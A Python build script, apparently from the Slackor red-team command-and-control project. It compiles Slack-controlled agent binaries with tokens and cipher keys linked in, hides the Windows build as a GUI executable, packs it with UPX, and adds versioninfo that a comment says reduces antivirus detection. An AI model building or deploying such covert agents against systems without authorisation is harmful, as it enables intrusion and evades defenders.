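# agent.py: builds the Slackor agent binaries from the settings stored in
# slackor.db and prints a SHA-256 for each artifact.
#
# Review notes on this revision:
#   * External tools are invoked with argv lists rather than `bash -c` strings,
#     so database values are never interpreted by a shell.
#   * Warnings name only the tool that failed, never its arguments, because
#     the go build arguments contain the token, bearer and cipher key.
#   * An empty KEYS or CHANNELS table now stops the script with a clear message
#     instead of a NameError further down.
#   * Artifacts are hashed in chunks through a context manager, so file
#     handles are closed.
import hashlib
import os.path
import random
import sqlite3
import subprocess
import sys

CONFIG_PKG = "github.com/Coalfire-Research/Slackor/internal/config"


def _last_row(cursor, table):
    """Return the final row of *cursor*, or exit if the table has no rows.

    The original loop kept overwriting its variables, so the last row won;
    that behavior is preserved here.
    """
    rows = cursor.fetchall()
    if not rows:
        sys.exit("slackor.db: table %s has no rows; cannot build agents" % table)
    return rows[-1]


def _run(argv, extra_env=None):
    """Run an external tool best-effort and report whether it succeeded.

    Failures are reported on stderr and do not abort the script, matching the
    original, which ignored every exit status.
    """
    env = dict(os.environ)
    if extra_env:
        env.update(extra_env)
    try:
        status = subprocess.run(argv, env=env).returncode
    except FileNotFoundError:
        print("warning: %s not found on PATH" % argv[0], file=sys.stderr)
        return False
    if status != 0:
        print("warning: %s exited with status %d" % (argv[0], status), file=sys.stderr)
    return status == 0


def _build(goos, goarch, output, linker_prefix, sources):
    """Cross-compile one agent binary with the settings linked in.

    -X sets package-level string variables at link time, so the channel IDs,
    bearer, token and cipher key end up inside every binary produced here.
    They are also present on the linker command line, which other local users
    can read from the process list while the build runs.
    """
    settings = (
        ("ResponseChannel", responses),
        ("RegistrationChannel", registration),
        ("CommandsChannel", commands),
        ("Bearer", bearer),
        ("Token", token),
        ("CipherKey", aes_key),
        # A fresh 128-hex-digit value is generated for every build.
        ("SerialNumber", '%0128x' % random.randrange(16**128)),
    )
    ldflags = linker_prefix + "".join(
        " -X %s.%s=%s" % (CONFIG_PKG, name, value) for name, value in settings
    )
    argv = ["go", "build", "-o", output, "-ldflags", ldflags] + list(sources)
    return _run(argv, {"GO111MODULE": "on", "GOOS": goos, "GOARCH": goarch})


conn = sqlite3.connect('slackor.db')
try:
    # Connect to database and get keys
    key_row = _last_row(conn.execute("SELECT * FROM KEYS"), "KEYS")
    token = key_row[1]
    bearer = key_row[2]
    aes_key = key_row[3]

    # Connect to database and get channels
    channel_row = _last_row(conn.execute("SELECT * FROM CHANNELS"), "CHANNELS")
    commands = channel_row[1]
    responses = channel_row[2]
    registration = channel_row[3]
finally:
    conn.close()

# Seed versioninfo, manifest and icon from the bundled examples when absent.
# Original author's stated purpose: valid-looking versioninfo to reduce A/V
# detection, so these resources are not a reliable indicator of a sample's origin.
for example, target in (
    ("versioninfo.example.json", "versioninfo.json"),
    ("versioninfo.example.manifest", "versioninfo.manifest"),
    ("icon.example.ico", "icon.ico"),
):
    if not os.path.exists(target):
        _run(["cp", "-p", example, target])

# Build exe and pack with UPX
_run(["go", "generate"], {"GO111MODULE": "on"})
# The Windows build names no source file, unlike the builds below.
_build("windows", "amd64", "dist/agent.windows.exe", "-s -w -H windowsgui", [])
_run(["cp", "-p", "dist/agent.windows.exe", "dist/agent.upx.exe"])
_run(["upx", "--force", "dist/agent.upx.exe"])

# Build for linux and macOS
_build("linux", "amd64", "dist/agent.64.linux", "-s -w", ["agent.go"])
_build("linux", "386", "dist/agent.32.linux", "-s -w", ["agent.go"])
_build("darwin", "amd64", "dist/agent.darwin", "-s -w", ["agent.go"])

# Print hashes. Each build links in a new random SerialNumber, so these
# digests identify only the artifacts of this run.
filenames = ["dist/agent.windows.exe", "dist/agent.upx.exe", "dist/agent.64.linux", "dist/agent.32.linux", "dist/agent.darwin"]
for filename in filenames:
    digest = hashlib.sha256()
    try:
        with open(filename, 'rb') as artifact:
            for chunk in iter(lambda: artifact.read(65536), b""):
                digest.update(chunk)
    except FileNotFoundError:
        # A failed build leaves no file; report it and hash the rest.
        print("warning: %s was not built; no hash" % filename, file=sys.stderr)
        continue
    print(digest.hexdigest() + " " + filename)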